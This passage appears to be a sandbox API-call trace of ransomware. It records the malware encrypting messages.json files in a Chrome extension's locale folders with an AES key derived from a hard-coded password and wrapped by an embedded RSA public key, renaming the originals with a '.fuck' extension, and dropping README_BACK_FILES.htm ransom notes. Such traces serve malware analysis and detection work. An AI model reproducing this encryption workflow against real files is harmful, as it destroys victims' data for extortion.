FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.524] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.525] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.525] GetLastError () returned 0x0 [0259.525] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json")) returned 0x20 [0259.525] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json", dwFileAttributes=0x80) returned 1 [0259.526] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.526] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.527] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.527] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.536] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.537] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.537] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.537] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.537] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.537] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.537] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6dba8) returned 1 [0259.537] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6dba8, dwCertEncodingType=0x1, pInfo=0x2e27db0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27de0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27de8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c980) returned 1 [0259.537] CryptEncrypt (in: hKey=0x2e7c980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.537] CryptEncrypt (in: hKey=0x2e7c980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6d3b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6d3b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.537] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6d3b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6d3b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.538] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x284, lpOverlapped=0x0) returned 1 [0259.540] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x284, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x290) returned 1 [0259.540] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x290, lpOverlapped=0x0) returned 1 [0259.554] CloseHandle (hObject=0x5d5c) returned 1 [0259.554] CloseHandle (hObject=0x5d60) returned 1 [0259.554] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), bFailIfExists=0) returned 1 [0259.557] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json", dwFileAttributes=0x0) returned 1 [0259.557] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.gsg")) returned 1 [0259.558] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.fuck")) returned 1 [0259.559] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.560] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.560] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.560] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.560] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.560] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\readme_back_files.htm")) returned 0xffffffff [0259.560] AreFileApisANSI () returned 1 [0259.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.560] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.561] GetFileType (hFile=0x5d64) returned 0x1 [0259.561] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.562] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.562] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.562] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.562] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.562] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.563] GetLastError () returned 0x0 [0259.563] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json")) returned 0x20 [0259.563] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0259.563] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.564] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.565] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.565] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.567] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.567] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.567] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.567] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.567] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.567] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.568] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6dcb8) returned 1 [0259.568] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6dcb8, dwCertEncodingType=0x1, pInfo=0x2e27e80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27eb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27eb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cfc0) returned 1 [0259.568] CryptEncrypt (in: hKey=0x2e7cfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.568] CryptEncrypt (in: hKey=0x2e7cfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6dd40*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6dd40*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.568] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6dd40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6dd40*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.569] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x282, lpOverlapped=0x0) returned 1 [0259.571] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x282, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x290) returned 1 [0259.571] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x290, lpOverlapped=0x0) returned 1 [0259.573] CloseHandle (hObject=0x5d60) returned 1 [0259.573] CloseHandle (hObject=0x5d5c) returned 1 [0259.573] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0259.576] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0259.576] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0259.577] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0259.578] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.578] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.578] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.578] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.578] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.578] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0259.578] AreFileApisANSI () returned 1 [0259.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.579] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.579] GetFileType (hFile=0x5d64) returned 0x1 [0259.579] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.580] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.580] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.581] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.581] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.581] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.581] GetLastError () returned 0x0 [0259.581] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json")) returned 0x20 [0259.581] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0259.582] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.582] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.583] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.583] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.585] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.585] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.585] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.585] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.585] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 